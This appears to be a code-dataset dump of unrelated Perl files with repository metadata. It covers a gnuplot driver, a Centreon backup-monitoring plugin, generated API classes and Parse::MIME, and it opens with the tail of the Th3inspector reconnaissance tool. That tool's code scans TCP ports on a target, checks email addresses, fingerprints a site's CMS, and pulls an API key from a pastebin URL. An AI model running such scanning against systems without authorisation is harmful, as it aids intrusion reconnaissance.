,1521 => 'Oracle SQL'
,2049 => 'NFS'
,3306 => 'mySQL'
,5800 => 'VNC'
,8080 => 'HTTP'
);
foreach my $p ( sort {$a<=>$b} keys( %ports ) )
{
$socket = IO::Socket::INET->new(PeerAddr => $target , PeerPort => "$p" , Proto => 'tcp' , Timeout => 1);
if( $socket ){
print item(); printf("%4s Open %s\n", $p, $ports{$p});
}else{
print item(); printf("%4s Closed %s\n", $p, $ports{$p});
}
}
}
####### Check e-mail address #######
sub email {
$url = "https://api.2ip.me/email.txt?email=$email";
$request = $ua->get($url);
$response = $request->content;
if($response =~/true/)
{
print item(),"E-mail address : $email \n";
print item(),"Valid : ";
print color('bold green'),"YES\n";
print color('reset');
}elsif($response =~/false/){
print item(),"E-mail address : $email \n";
print item(),"Valid : ";
print color('bold red'),"NO\n";
print color('reset');
}else{
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Check If E-mail Exists\n";
}
}
####### Check Content Management System (CMS) #######
sub cms {
$url = "https://pastebin.com/raw/CYaZrPFP";
$request = $ua->get($url);
$api12 = $request->content;
$url = "https://whatcms.org/APIEndpoint?key=$api12&url=$site7";
$request = $ua->get($url);
$response = $request->content;
my $responseObject = decode_json($response);
if($response =~/Success/){
print item(),"WebSite : $site7 \n";
if (exists $responseObject->{'result'}->{'name'}){
print item(),'CMS: ',
$responseObject->{'result'}->{'name'},"\n";}
if (exists $responseObject->{'result'}->{'version'}){
print item(),'Version: ',
$responseObject->{'result'}->{'version'},"\n";}
}elsif($response =~/CMS Not Found/){
print item(),"WebSite : $site7 \n";
print item(),"CMS :";
print color("bold red")," Not Found\n";
print color('reset');
}else{
print item(),"There Is A Problem\n\n";
print item('1'),"Checking The Connection\n";
print item('2'),"Enter Website Without HTTP/HTTPs\n";
print item('3'),"Check If Website Working\n";
}
}
##### Update #######
sub update {
if ($^O =~ /MSWin32/) {
banner();
print item('1'),"Download Th3inspector\n";
print item('2'),"Extract Th3inspector into Desktop\n";
print item('3'),"Open CMD and type the following commands:\n";
print item('4'),"cd Desktop/Th3inspector-master/\n";
print item('5'),"perl Th3inspector.pl\n";
}else {
$linux = "/usr/share/Th3inspector";
$termux = "/data/data/com.termux/files/usr/share/Th3inspector";
if (-d $linux){
system("bash /usr/share/Th3inspector/update.sh");
} elsif (-d $termux){
system("chmod +x /data/data/com.termux/files/usr/share/Th3inspector/update.sh && bash /data/data/com.termux/files/usr/share/Th3inspector/update.sh");
}
}
}
##### Enter #######
sub enter {
print "\n";
print item(),"Press ";
print color('bold red'),"[";
print color("bold white"),"ENTER";
print color('bold red'),"] ";
print color("bold white"),"Key To Continue\n";
local( $| ) = ( 1 );
my $resp = <STDIN>;
banner();
menu();
}
### Item format ###
sub item
{
my $n = shift // '+';
return color('bold red')," ["
, color('bold green'),"$n"
, color('bold red'),"] "
, color("bold white")
;
}
__END__
| 38.436508 | 189 | 0.524288 |
eda8aab1cb2512535e5d9ffcd94aa024a3f85c1c | 1,917 | pl | Perl | ABC/Tests_JavaPlot/global/driveGnuPlots_v2.pl | andrejadd/ABC-bee-opt | 746b2f8eb8eeab27e0af515aa129ad8a00b035e5 | [
"MIT"
] | null | null | null | ABC/Tests_JavaPlot/global/driveGnuPlots_v2.pl | andrejadd/ABC-bee-opt | 746b2f8eb8eeab27e0af515aa129ad8a00b035e5 | [
"MIT"
] | null | null | null | ABC/Tests_JavaPlot/global/driveGnuPlots_v2.pl | andrejadd/ABC-bee-opt | 746b2f8eb8eeab27e0af515aa129ad8a00b035e5 | [
"MIT"
] | null | null | null | #!/usr/bin/perl -w
use strict;
sub main {
my $numberOfStreams = 1;
print "Will display $numberOfStreams Streams (in $numberOfStreams windows)...\n";
my $samples = <STDIN>;
my @minmax = split(/:/, <STDIN>);
chomp $samples;
chomp($minmax[1]);
my @sampleSizes;
for(my $i=0; $i<$numberOfStreams; $i++) {
push @sampleSizes, $samples;
print "Stream ".($i+1)." will use a window of $samples samples.\n";
}
my @ranges;
for(my $i=0; $i<$numberOfStreams; $i++) {
my $miny = $minmax[0];
my $maxy = $minmax[1];
push @ranges, [ $miny, $maxy ];
print "Stream ".($i+1)." will use a range of [$miny, $maxy]\n";
}
my @gnuplots;
my @buffers;
shift @ARGV; # number of streams
for(my $i=0; $i<$numberOfStreams; $i++) {
shift @ARGV; # sample size
shift @ARGV; # miny
shift @ARGV; # maxy
local *PIPE;
open PIPE, "|gnuplot" || die "Can't initialize gnuplot number ".($i+1)."\n";
select((select(PIPE), $| = 1)[0]);
push @gnuplots, *PIPE;
#print PIPE "set xtics\n";
#print PIPE "set ytics\n";
print PIPE "set xrange [".($ranges[$i]->[0]).":".($ranges[$i]->[1])."]\n";
print PIPE "set yrange [".($ranges[$i]->[0]).":".($ranges[$i]->[1])."]\n";
print PIPE "set style data points\n";
print PIPE "set grid\n";
my @data = [];
push @buffers, @data;
}
my $streamIdx = 0;
select((select(STDOUT), $| = 1)[0]);
my $pip = $gnuplots[$streamIdx];
my $loop = 0;
my $run = 1;
while($run) {
print STDOUT $loop++ . "\n";
my @buf;
my $samplecounter = $samples;
while(<>) {
chomp;
if(/exit/) {
$run = 0;
last;
}
push @buf, $_;
$samplecounter--;
if($samplecounter == 0) {
last;
}
}
print $pip "plot \"-\" notitle\n";
for my $elem (reverse @buf) {
print $pip ($elem)."\n";
}
print $pip "e\n";
}
print $pip "exit;\n";
close $pip;
}
main;
| 18.980198 | 85 | 0.53469 |
ed75e0b332c4ee67656144f40e554695a8da0b6b | 9,669 | pm | Perl | apps/backup/arcserve/udp/mssql/mode/jobstatus.pm | bert-jan/centreon-plugins | b4795f511fddf63402727750b45cc6c5ad69aad4 | [
"Apache-2.0"
] | null | null | null | apps/backup/arcserve/udp/mssql/mode/jobstatus.pm | bert-jan/centreon-plugins | b4795f511fddf63402727750b45cc6c5ad69aad4 | [
"Apache-2.0"
] | null | null | null | apps/backup/arcserve/udp/mssql/mode/jobstatus.pm | bert-jan/centreon-plugins | b4795f511fddf63402727750b45cc6c5ad69aad4 | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2021 Centreon (http://www.centreon.com/)
#
# Centreon is a full-fledged industry-strength solution that meets
# the needs in IT infrastructure and application monitoring for
# service performance.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
package apps::backup::arcserve::udp::mssql::mode::jobstatus;
use base qw(centreon::plugins::templates::counter);
use strict;
use warnings;
sub custom_status_threshold {
my ($self, %options) = @_;
my $status = 'ok';
# To exclude some OK
if (defined($self->{instance_mode}->{option_results}->{ok_status}) && $self->{instance_mode}->{option_results}->{ok_status} ne '' &&
$self->eval(value => $self->{instance_mode}->{option_results}->{ok_status})) {
$status = 'ok';
} elsif (defined($self->{instance_mode}->{option_results}->{critical_status}) && $self->{instance_mode}->{option_results}->{critical_status} ne '' &&
$self->eval(value => $self->{instance_mode}->{option_results}->{critical_status})) {
$status = 'critical';
} elsif (defined($self->{instance_mode}->{option_results}->{warning_status}) && $self->{instance_mode}->{option_results}->{warning_status} ne '' &&
$self->eval(value => $self->{instance_mode}->{option_results}->{warning_status})) {
$status = 'warning';
}
return $status;
}
sub custom_status_output {
my ($self, %options) = @_;
return sprintf(
'status : %s (%s) [type: %s] [remote hostname: %s] [vmname: %s] [plan name: %s] [end time: %s]',
$self->{result_values}->{status} == 1 ? 'ok' : 'failed',
$self->{result_values}->{status},
$self->{result_values}->{type},
$self->{result_values}->{rhostname},
$self->{result_values}->{vmname},
$self->{result_values}->{plan_name},
scalar(localtime($self->{result_values}->{end_time}))
);
}
sub set_counters {
my ($self, %options) = @_;
$self->{maps_counters_type} = [
{ name => 'global', type => 0 },
{ name => 'job', type => 1, cb_prefix_output => 'prefix_job_output', message_multiple => 'All jobs are ok' },
];
$self->{maps_counters}->{global} = [
{ label => 'total', nlabel => 'jobs.total.count', set => {
key_values => [ { name => 'total' } ],
output_template => 'total jobs : %s',
perfdatas => [
{ label => 'total', value => 'total', template => '%s', min => 0 },
],
}
},
];
$self->{maps_counters}->{job} = [
{ label => 'status', threshold => 0, set => {
key_values => [
{ name => 'status' }, { name => 'display' },
{ name => 'type' }, { name => 'rhostname' }, { name => 'vmname' }, { name => 'plan_name' },
{ name => 'elapsed_time' }, { name => 'end_time' }
],
closure_custom_output => $self->can('custom_status_output'),
closure_custom_perfdata => sub { return 0; },
closure_custom_threshold_check => $self->can('custom_status_threshold')
}
},
];
}
sub new {
my ($class, %options) = @_;
my $self = $class->SUPER::new(package => __PACKAGE__, %options, force_new_perfdata => 1);
bless $self, $class;
$options{options}->add_options(arguments => {
'filter-server-name:s' => { name => 'filter_server_name' },
'filter-type:s' => { name => 'filter_type' },
'filter-start-time:s' => { name => 'filter_start_time' },
'filter-end-time:s' => { name => 'filter_end_time', default => 86400 },
'ok-status:s' => { name => 'ok_status', default => '%{status} == 1' },
'warning-status:s' => { name => 'warning_status', default => '' },
'critical-status:s' => { name => 'critical_status', default => '%{status} != 1' },
'timezone:s' => { name => 'timezone' }
});
return $self;
}
sub check_options {
my ($self, %options) = @_;
$self->SUPER::check_options(%options);
$self->change_macros(macros => [
'ok_status', 'warning_status', 'critical_status'
]
);
if (defined($self->{option_results}->{timezone}) && $self->{option_results}->{timezone} ne '') {
$ENV{TZ} = $self->{option_results}->{timezone};
}
}
sub prefix_job_output {
my ($self, %options) = @_;
return "job '" . $options{instance_value}->{display} . "' ";
}
sub manage_selection {
my ($self, %options) = @_;
my $query = q{
SELECT
lj.jobId,
lj.jobStatus,
rhostname,
vmname,
DATEDIFF(s, '1970-01-01 00:00:00', lj.jobLocalStartTime) as start_time,
DATEDIFF(s, '1970-01-01 00:00:00', lj.jobLocalEndTime) as end_time,
ep.name,
lj.jobType,
lj.jobStatus
FROM as_edge_d2dJobHistory_lastJob lj LEFT OUTER JOIN as_edge_policy ep ON lj.planUUID = ep.uuid
LEFT JOIN as_edge_host h on lj.agentId = h.rhostid
LEFT JOIN as_edge_vsphere_entity_host_map entityHostMap ON h.rhostid = entityHostMap.hostId
LEFT JOIN as_edge_vsphere_vm_detail vmDetail ON entityHostMap.entityId=vmDetail.entityId
};
$options{sql}->connect();
$options{sql}->query(query => $query);
$self->{global} = { total => 0 };
$self->{job} = {};
my ($count, $current_time) = (0, time());
while ((my $row = $options{sql}->fetchrow_hashref())) {
my $rhostname = defined($row->{rhostname}) && $row->{rhostname} ne '' ? $row->{rhostname} : 'unknown';
my $vmname = defined($row->{vmname}) && $row->{vmname} ne '' ? $row->{vmname} : '-';
my $plan_name = defined($row->{name}) && $row->{name} ne '' ? $row->{name} : 'unknown';
if (defined($self->{option_results}->{filter_type}) && $self->{option_results}->{filter_type} ne '' &&
$row->{jobType} !~ /$self->{option_results}->{filter_type}/) {
$self->{output}->output_add(long_msg => "skipping job '" . $row->{jobId} . "': no matching filter type.", debug => 1);
next;
}
if (defined($self->{option_results}->{filter_end_time}) && $self->{option_results}->{filter_end_time} =~ /[0-9]+/ &&
defined($row->{end_time}) && $row->{end_time} =~ /[0-9]+/ && $row->{end_time} < ($current_time - $self->{option_results}->{filter_end_time})) {
$self->{output}->output_add(long_msg => "skipping job '" . $row->{jobId} . "': end time too old.", debug => 1);
next;
}
if (defined($self->{option_results}->{filter_start_time}) && $self->{option_results}->{filter_start_time} =~ /[0-9]+/ &&
defined($row->{start_time}) && $row->{start_time} =~ /[0-9]+/ && $row->{start_time} < ($current_time - $self->{option_results}->{filter_start_time})) {
$self->{output}->output_add(long_msg => "skipping job '" . $row->{jobId} . "': start time too old.", debug => 1);
next;
}
if (defined($self->{option_results}->{filter_server_name}) && $self->{option_results}->{filter_server_name} ne '' &&
($row->{rhostname} !~ /$self->{option_results}->{filter_server_name}/ && $vmname !~ /$self->{option_results}->{filter_server_name}/)) {
$self->{output}->output_add(long_msg => "skipping job '" . $row->{jobId} . "': no matching filter type.", debug => 1);
next;
}
my $elapsed_time = defined($row->{start_time}) ? $current_time - $row->{start_time} : -1;
$self->{job}->{$row->{jobId}} = {
display => $row->{jobId},
elapsed_time => $elapsed_time,
status => $row->{jobStatus},
type => $row->{jobType},
rhostname => $rhostname,
vmname => $vmname,
plan_name => $plan_name,
end_time => $row->{end_time},
};
$self->{global}->{total}++;
}
}
1;
__END__
=head1 MODE
Check job status.
=over 8
=item B<--filter-server-name>
Filter job server name (can be a regexp).
=item B<--filter-type>
Filter job type (can be a regexp).
=item B<--filter-start-time>
Filter job with start time greater than current time less value in seconds.
=item B<--filter-end-time>
Filter job with end time greater than current time less value in seconds (Default: 86400).
=item B<--timezone>
Timezone of mssql server (If not set, we use current server execution timezone).
=item B<--ok-status>
Set ok threshold for status (Default: '%{status} == 1')
Can used special variables like: %{display}, %{status}
=item B<--warning-status>
Set warning threshold for status (Default: '%{status} == 1')
Can used special variables like: %{display}, %{status}, %{type}
=item B<--critical-status>
Set critical threshold for status (Default: '%{status} != 1').
Can used special variables like: %{display}, %{status}, %{type}
=item B<--warning-total>
Set warning threshold for total jobs.
=item B<--critical-total>
Set critical threshold for total jobs.
=back
=cut
| 37.622568 | 163 | 0.573999 |
ed6ce8fdad2fa6930a6a5bea4b8228a2ba6d63ee | 4,573 | pm | Perl | lib/EzmaxApi/Object/FieldEEzsignformfieldgroupType.pm | ezmaxinc/eZmax-SDK-perl | 3de20235136371b946247d2aed9e5e5704a4051c | [
"MIT"
] | null | null | null | lib/EzmaxApi/Object/FieldEEzsignformfieldgroupType.pm | ezmaxinc/eZmax-SDK-perl | 3de20235136371b946247d2aed9e5e5704a4051c | [
"MIT"
] | null | null | null | lib/EzmaxApi/Object/FieldEEzsignformfieldgroupType.pm | ezmaxinc/eZmax-SDK-perl | 3de20235136371b946247d2aed9e5e5704a4051c | [
"MIT"
] | null | null | null | =begin comment
eZmax API Definition (Full)
This API expose all the functionnalities for the eZmax and eZsign applications.
The version of the OpenAPI document: 1.1.7
Contact: support-api@ezmax.ca
Generated by: https://openapi-generator.tech
=end comment
=cut
#
# NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
# Do not edit the class manually.
# Ref: https://openapi-generator.tech
#
package EzmaxApi::Object::FieldEEzsignformfieldgroupType;
require 5.6.0;
use strict;
use warnings;
use utf8;
use JSON qw(decode_json);
use Data::Dumper;
use Module::Runtime qw(use_module);
use Log::Any qw($log);
use Date::Parse;
use DateTime;
use base ("Class::Accessor", "Class::Data::Inheritable");
#
#The Type of Ezsignformfieldgroup
#
# NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech). Do not edit the class manually.
# REF: https://openapi-generator.tech
#
=begin comment
eZmax API Definition (Full)
This API expose all the functionnalities for the eZmax and eZsign applications.
The version of the OpenAPI document: 1.1.7
Contact: support-api@ezmax.ca
Generated by: https://openapi-generator.tech
=end comment
=cut
#
# NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
# Do not edit the class manually.
# Ref: https://openapi-generator.tech
#
__PACKAGE__->mk_classdata('attribute_map' => {});
__PACKAGE__->mk_classdata('openapi_types' => {});
__PACKAGE__->mk_classdata('method_documentation' => {});
__PACKAGE__->mk_classdata('class_documentation' => {});
# new plain object
sub new {
my ($class, %args) = @_;
my $self = bless {}, $class;
$self->init(%args);
return $self;
}
# initialize the object
sub init
{
my ($self, %args) = @_;
foreach my $attribute (keys %{$self->attribute_map}) {
my $args_key = $self->attribute_map->{$attribute};
$self->$attribute( $args{ $args_key } );
}
}
# return perl hash
sub to_hash {
my $self = shift;
my $_hash = decode_json(JSON->new->convert_blessed->encode($self));
return $_hash;
}
# used by JSON for serialization
sub TO_JSON {
my $self = shift;
my $_data = {};
foreach my $_key (keys %{$self->attribute_map}) {
if (defined $self->{$_key}) {
$_data->{$self->attribute_map->{$_key}} = $self->{$_key};
}
}
return $_data;
}
# from Perl hashref
sub from_hash {
my ($self, $hash) = @_;
# loop through attributes and use openapi_types to deserialize the data
while ( my ($_key, $_type) = each %{$self->openapi_types} ) {
my $_json_attribute = $self->attribute_map->{$_key};
if ($_type =~ /^array\[(.+)\]$/i) { # array
my $_subclass = $1;
my @_array = ();
foreach my $_element (@{$hash->{$_json_attribute}}) {
push @_array, $self->_deserialize($_subclass, $_element);
}
$self->{$_key} = \@_array;
} elsif ($_type =~ /^hash\[string,(.+)\]$/i) { # hash
my $_subclass = $1;
my %_hash = ();
while (my($_key, $_element) = each %{$hash->{$_json_attribute}}) {
$_hash{$_key} = $self->_deserialize($_subclass, $_element);
}
$self->{$_key} = \%_hash;
} elsif (exists $hash->{$_json_attribute}) { #hash(model), primitive, datetime
$self->{$_key} = $self->_deserialize($_type, $hash->{$_json_attribute});
} else {
$log->debugf("Warning: %s (%s) does not exist in input hash\n", $_key, $_json_attribute);
}
}
return $self;
}
# deserialize non-array data
sub _deserialize {
my ($self, $type, $data) = @_;
$log->debugf("deserializing %s with %s",Dumper($data), $type);
if ($type eq 'DateTime') {
return DateTime->from_epoch(epoch => str2time($data));
} elsif ( grep( /^$type$/, ('int', 'double', 'string', 'boolean'))) {
return $data;
} else { # hash(model)
my $_instance = eval "EzmaxApi::Object::$type->new()";
return $_instance->from_hash($data);
}
}
__PACKAGE__->class_documentation({description => 'The Type of Ezsignformfieldgroup',
class => 'FieldEEzsignformfieldgroupType',
required => [], # TODO
} );
__PACKAGE__->method_documentation({
});
__PACKAGE__->openapi_types( {
} );
__PACKAGE__->attribute_map( {
} );
__PACKAGE__->mk_accessors(keys %{__PACKAGE__->attribute_map});
1;
| 25.836158 | 123 | 0.611634 |
eda83f8183a9bed46b5e89c117e7b977398d25ce | 1,772 | pm | Perl | auto-lib/Paws/Route53/ListHealthChecksResponse.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 164 | 2015-01-08T14:58:53.000Z | 2022-02-20T19:16:24.000Z | auto-lib/Paws/Route53/ListHealthChecksResponse.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 348 | 2015-01-07T22:08:38.000Z | 2022-01-27T14:34:44.000Z | auto-lib/Paws/Route53/ListHealthChecksResponse.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 87 | 2015-04-22T06:29:47.000Z | 2021-09-29T14:45:55.000Z |
package Paws::Route53::ListHealthChecksResponse;
use Moose;
has HealthChecks => (is => 'ro', isa => 'ArrayRef[Paws::Route53::HealthCheck]', request_name => 'HealthCheck', traits => ['NameInRequest'], required => 1);
has IsTruncated => (is => 'ro', isa => 'Bool', required => 1);
has Marker => (is => 'ro', isa => 'Str', required => 1);
has MaxItems => (is => 'ro', isa => 'Str', required => 1);
has NextMarker => (is => 'ro', isa => 'Str');
has _request_id => (is => 'ro', isa => 'Str');
1;
### main pod documentation begin ###
=head1 NAME
Paws::Route53::ListHealthChecksResponse
=head1 ATTRIBUTES
=head2 B<REQUIRED> HealthChecks => ArrayRef[L<Paws::Route53::HealthCheck>]
A complex type that contains one C<HealthCheck> element for each health
check that is associated with the current AWS account.
=head2 B<REQUIRED> IsTruncated => Bool
A flag that indicates whether there are more health checks to be
listed. If the response was truncated, you can get the next group of
health checks by submitting another C<ListHealthChecks> request and
specifying the value of C<NextMarker> in the C<marker> parameter.
=head2 B<REQUIRED> Marker => Str
For the second and subsequent calls to C<ListHealthChecks>, C<Marker>
is the value that you specified for the C<marker> parameter in the
previous request.
=head2 B<REQUIRED> MaxItems => Str
The value that you specified for the C<maxitems> parameter in the call
to C<ListHealthChecks> that produced the current response.
=head2 NextMarker => Str
If C<IsTruncated> is C<true>, the value of C<NextMarker> identifies the
first health check that Amazon Route 53 returns if you submit another
C<ListHealthChecks> request and specify the value of C<NextMarker> in
the C<marker> parameter.
=cut
| 26.848485 | 157 | 0.717833 |
eda538fdf4a509d7ca881b7820d27bd303025be6 | 6,883 | pm | Perl | lib/Parse/MIME.pm | gitpan/Parse-MIME | 2195007335ea9a07e919e9766cb91766a2b3808b | [
"Artistic-1.0"
] | null | null | null | lib/Parse/MIME.pm | gitpan/Parse-MIME | 2195007335ea9a07e919e9766cb91766a2b3808b | [
"Artistic-1.0"
] | null | null | null | lib/Parse/MIME.pm | gitpan/Parse-MIME | 2195007335ea9a07e919e9766cb91766a2b3808b | [
"Artistic-1.0"
] | null | null | null | use 5.006;
use strict;
use warnings;
package Parse::MIME;
$Parse::MIME::VERSION = '1.002';
# ABSTRACT: Parse mime-types, match against media ranges
use Exporter 'import';
our @EXPORT_OK = qw(
&parse_mime_type &parse_media_range &parse_media_range_list
&fitness_and_quality_parsed &quality_parsed &quality
&best_match
);
our %EXPORT_TAGS = ( all => \@EXPORT_OK );
sub _numify($) { no warnings 'numeric'; 0 + shift }
# takes any number of args and returns copies stripped of surrounding whitespace
sub _strip { s/\A +//, s/ +\z// for my @s = @_; @s[ 0 .. $#s ] }
# check whether first two args are equal or one of them is a wildcard
sub _match { $_[0] eq $_[1] or grep { $_ eq '*' } @_[0,1] }
sub parse_mime_type {
my ( $mime_type ) = @_;
my @part = split /;/, $mime_type;
my $full_type = _strip shift @part;
my %param = map { _strip split /=/, $_, 2 } @part;
# Java URLConnection class sends an Accept header that includes a single "*"
# Turn it into a legal wildcard.
$full_type = '*/*' if $full_type eq '*';
my ( $type, $subtype ) = _strip split m!/!, $full_type;
return ( $type, $subtype, \%param );
}
sub parse_media_range {
my ( $range ) = @_;
my ( $type, $subtype, $param ) = parse_mime_type $range;
$param->{'q'} = 1
unless defined $param->{'q'}
and length $param->{'q'}
and _numify $param->{'q'} <= 1
and _numify $param->{'q'} >= 0;
return ( $type, $subtype, $param );
}
sub parse_media_range_list {
my ( $media_range_list ) = @_;
return map { parse_media_range $_ } split /,/, $media_range_list;
}
sub fitness_and_quality_parsed {
my ( $mime_type, @parsed_ranges ) = @_;
my ( $best_fitness, $best_fit_q ) = ( -1, 0 );
my ( $target_type, $target_subtype, $target_param )
= parse_media_range $mime_type;
while ( my ( $type, $subtype, $param ) = splice @parsed_ranges, 0, 3 ) {
if ( _match( $type, $target_type ) and _match( $subtype, $target_subtype ) ) {
my $fitness
= ( $type eq $target_type ? 100 : 0 )
+ ( $subtype eq $target_subtype ? 10 : 0 )
;
while ( my ( $k, $v ) = each %$param ) {
++$fitness
if $k ne 'q'
and exists $target_param->{ $k }
and $target_param->{ $k } eq $v;
}
( $best_fitness, $best_fit_q ) = ( $fitness, $param->{'q'} )
if $fitness > $best_fitness;
}
}
return ( $best_fitness, _numify $best_fit_q );
}
sub quality_parsed {
return +( fitness_and_quality_parsed @_ )[1];
}
sub quality {
my ( $mime_type, $ranges ) = @_;
my @parsed_range = parse_media_range_list $ranges;
return quality_parsed $mime_type, @parsed_range;
}
sub best_match {
my ( $supported, $header ) = @_;
my @parsed_header = parse_media_range_list $header;
# fitness_and_quality_parsed will return fitness -1 on failure,
# so we want to start with an invalid value greater than that
my ( $best_fitness, $best_fit_q, $match ) = ( -.5, 0 );
for my $type ( @$supported ) {
my ( $fitness, $fit_q ) = fitness_and_quality_parsed $type, @parsed_header;
next if $fitness < $best_fitness;
next if $fitness == $best_fitness and $fit_q < $best_fit_q;
( $best_fitness, $best_fit_q, $match ) = ( $fitness, $fit_q, $type );
}
return if not defined $match;
return $match;
}
__END__
=pod
=encoding UTF-8
=head1 NAME
Parse::MIME - Parse mime-types, match against media ranges
=head1 VERSION
version 1.002
=head1 SYNOPSIS
use Parse::MIME qw( best_match );
print best_match( [ qw( application/xbel+xml text/xml ) ], 'text/*;q=0.5,*/*; q=0.1' );
# text/xml
=head1 DESCRIPTION
This module provides basic functions for handling mime-types. It can handle matching mime-types against a list of media-ranges. See section 14.1 of the HTTP specification [RFC 2616] for a complete explanation: L<http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.1>
=head1 INTERFACE
None of the following functions are exported by default. You can use the C<:all> tag to import all of them into your package:
use Parse::MIME ':all';
=head2 parse_mime_type
Parses a mime-type into its component parts and returns type, subtype and params, where params is a reference to a hash of all the parameters for the media range:
parse_mime_type 'application/xhtml;q=0.5'
# ( 'application', 'xhtml', { q => 0.5 } )
=head2 parse_media_range
Media-ranges are mime-types with wild-cards and a C<q> quality parameter. This function works just like L</parse_mime_type>, but also guarantees that there is a value for C<q> in the params hash, supplying the default value if necessary.
parse_media_range 'application/xhtml'
# ( 'application', 'xhtml', { q => 1 } )
=head2 parse_media_range_list
Media-range lists are comma-separated lists of media ranges. This function works just like L</parse_media_range>, but accepts a list of media ranges and returns for all of media-ranges.
my @l = parse_media_range_list 'application/xhtml, text/html;q=0.7'
# ( 'application', 'xhtml', { q => 1 }, 'text', 'html', { q => 0.7 } )
=head2 fitness_and_quality_parsed
Find the best match for a given mime-type (passed as the first parameter) against a list of media ranges that have already been parsed by L</parse_media_range> (passed as a flat list). Returns the fitness value and the value of the C<q> quality parameter of the best match, or C<( -1, 0 )> if no match was found.
# for @l see above
fitness_and_quality_parsed( 'text/html', @l )
# ( 110, 0.7 )
=head2 quality
Determines the quality (C<q>) of a mime-type (passed as the first parameter) when compared against a media-range list string. F.ex.:
quality( 'text/html', 'text/*;q=0.3, text/html;q=0.7, text/html;level=1, text/html;level=2;q=0.4, */*;q=0.5' )
# 0.7
=head2 quality_parsed
Just like L</quality>, except the second parameter must be pre-parsed by L</parse_media_range_list>.
=head2 best_match
Choose the mime-type with the highest quality (C<q>) from a list of candidates. Takes an array of supported mime-types as the first parameter and finds the best match for all the media-ranges listed in header, which is passed as the second parameter. The value of header must be a string that conforms to the format of the HTTP C<Accept> header. F.ex.:
best_match( [ qw( application/xbel+xml text/xml ) ], 'text/*;q=0.5,*/*; q=0.1' )
# 'text/xml'
=head1 AUTHOR
=over 4
=item * Joe Gregorio L<mailto:joe@bitworking.org>
Original Python code
=item * Aristotle Pagaltzis L<mailto:pagaltzis@gmx.de>
Perl port
=back
=head1 COPYRIGHT AND LICENCE
Documentation: Copyright (c) 2008, Joe Gregorio. All rights reserved.
Perl code: Copyright (c) 2008, Aristotle Pagaltzis. All rights reserved.
=head1 AUTHOR
Aristotle Pagaltzis <pagaltzis@gmx.de>
=head1 COPYRIGHT AND LICENSE
This software is copyright (c) 2015 by Aristotle Pagaltzis.
This is free software; you can redistribute it and/or modify it under
the same terms as the Perl 5 programming language system itself.
=cut
| 29.926087 | 352 | 0.692576 |
edada6e14ef7fa7b13977eb3d5e73e1190fbaea8 | 393 | pm | Perl | lib/DDG/Spice/CveSummary.pm | imwally/zeroclickinfo-spice | 1ce4991c95b384fe21b1d2acf86b58497a4ff50e | [
"Apache-2.0"
] | 1 | 2017-03-14T04:27:47.000Z | 2017-03-14T04:27:47.000Z | lib/DDG/Spice/CveSummary.pm | imwally/zeroclickinfo-spice | 1ce4991c95b384fe21b1d2acf86b58497a4ff50e | [
"Apache-2.0"
] | null | null | null | lib/DDG/Spice/CveSummary.pm | imwally/zeroclickinfo-spice | 1ce4991c95b384fe21b1d2acf86b58497a4ff50e | [
"Apache-2.0"
] | null | null | null | package DDG::Spice::CveSummary;
# Displays a summary for a CVE.
#
use DDG::Spice;
spice is_cached => 1;
spice to => 'https://cve.circl.lu/api/cve/$1';
spice wrap_jsonp_callback => 1;
triggers start => "cve";
handle query_lc => sub {
return unless $_ =~ qr/^cve-\d{4}-\d{4}/s; # match specific CVE pattern
return unless $_; # Guard against "no answer"
return uc $_;
};
1;
| 18.714286 | 75 | 0.636132 |
ed7df80f8efd00ea2bd1b04d5d8a3a29febac857 | 853 | pm | Perl | Source/Manip/Offset/off025.pm | ssp/Pester | f2d8ec2f62bfb83656f77f3ee41b54149287904a | [
"BSD-2-Clause"
] | 59 | 2015-01-11T18:44:25.000Z | 2022-03-07T22:56:02.000Z | Source/Manip/Offset/off025.pm | ssp/Pester | f2d8ec2f62bfb83656f77f3ee41b54149287904a | [
"BSD-2-Clause"
] | 11 | 2015-06-19T11:01:00.000Z | 2018-06-05T21:30:17.000Z | Source/Manip/Offset/off025.pm | ssp/Pester | f2d8ec2f62bfb83656f77f3ee41b54149287904a | [
"BSD-2-Clause"
] | 7 | 2015-09-21T21:04:59.000Z | 2022-02-13T18:26:47.000Z | package #
Date::Manip::Offset::off025;
# Copyright (c) 2008-2014 Sullivan Beck. All rights reserved.
# This program is free software; you can redistribute it and/or modify it
# under the same terms as Perl itself.
# This file was automatically generated. Any changes to this file will
# be lost the next time 'tzdata' is run.
# Generated on: Fri Nov 21 11:03:44 EST 2014
# Data version: tzdata2014j
# Code version: tzcode2014j
# This module contains data from the zoneinfo time zone database. The original
# data was obtained from the URL:
# ftp://ftp.iana.orgtz
use strict;
use warnings;
require 5.010000;
our ($VERSION);
$VERSION='6.48';
END { undef $VERSION; }
our ($Offset,%Offset);
END {
undef $Offset;
undef %Offset;
}
$Offset = '+01:08:24';
%Offset = (
0 => [
'africa/windhoek',
],
);
1;
| 21.325 | 79 | 0.66823 |
ed0f334c05979f7e0c60b93ed4800b457d786363 | 5,208 | pl | Perl | admin/RemoveSpamAccounts.pl | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | 577 | 2015-01-15T12:18:50.000Z | 2022-03-16T20:41:57.000Z | admin/RemoveSpamAccounts.pl | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
